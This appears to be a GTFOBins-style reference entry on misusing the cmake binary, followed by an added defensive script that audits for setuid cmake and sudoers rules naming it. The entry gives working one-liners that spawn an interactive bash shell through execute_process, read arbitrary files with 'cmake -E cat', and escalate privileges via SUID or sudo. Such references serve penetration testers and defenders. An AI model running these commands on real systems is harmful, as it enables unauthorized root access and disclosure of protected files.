description |
code |
It can be used to break out from a restricted environment by spawning an interactive system shell. |
echo "execute_process(COMMAND bash -i)" > CMakeLists.txt
cmake .
|
|
|
description |
code |
It can read files, and may be used to perform privileged reads or disclose files outside a restricted file system. |
LFILE=file_to_read
cmake -E cat "$LFILE"
|
|
|
description |
code |
It can perform execution in a privileged context if the SUID bit is set. |
echo "execute_process(COMMAND whoami)" > CMakeLists.txt
cmake .
|
|
|
description |
code |
It can perform execution in a privileged context if the user can run the binary with sudo. |
echo "execute_process(COMMAND bash -i)" > CMakeLists.txt
sudo cmake .
|
|
|
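A defender's check for the two privileged cases listed above (SUID bit, sudo rule), as an added example that is not part of the original page: it reports a setuid/setgid cmake binary and sudoers lines that name cmake by path. The function names, the `--run` switch and the default file paths are assumptions of this example.

```shell
#!/bin/sh
# Added audit example; not code from the original page.

# has_setid FILE: true if FILE is a regular file with the setuid or setgid bit set.
has_setid() {
    [ -f "$1" ] && { [ -u "$1" ] || [ -g "$1" ]; }
}

# sudoers_cmake_rules FILE...: print non-comment sudoers lines that name a
# cmake binary by path. Blanket "ALL" command grants are not reported here.
sudoers_cmake_rules() {
    [ $# -gt 0 ] || return 0
    grep -hE '^[[:space:]]*[^#[:space:]].*/cmake([[:space:],]|$)' "$@" 2>/dev/null || true
}

# audit_cmake BIN [SUDOERS_FILE...]: print one finding per line;
# return 0 when clean, 1 when anything was found.
audit_cmake() {
    bin=$1; shift
    rc=0
    if has_setid "$bin"; then
        echo "SETID: $bin"
        rc=1
    fi
    rules=$(sudoers_cmake_rules "$@")
    if [ -n "$rules" ]; then
        echo "$rules" | sed 's/^/SUDOERS: /'
        rc=1
    fi
    return $rc
}

# Audit the live system only when asked: sh audit.sh --run
# (run as root so the sudoers files are readable).
if [ "${1:-}" = "--run" ]; then
    audit_cmake "$(command -v cmake || echo /usr/bin/cmake)" \
        /etc/sudoers /etc/sudoers.d/*
fi
```

A `SETID` finding is cleared by removing the bit (`chmod u-s,g-s`) from the binary; a `SUDOERS` finding means the rule grants command execution as the target user, not just a build.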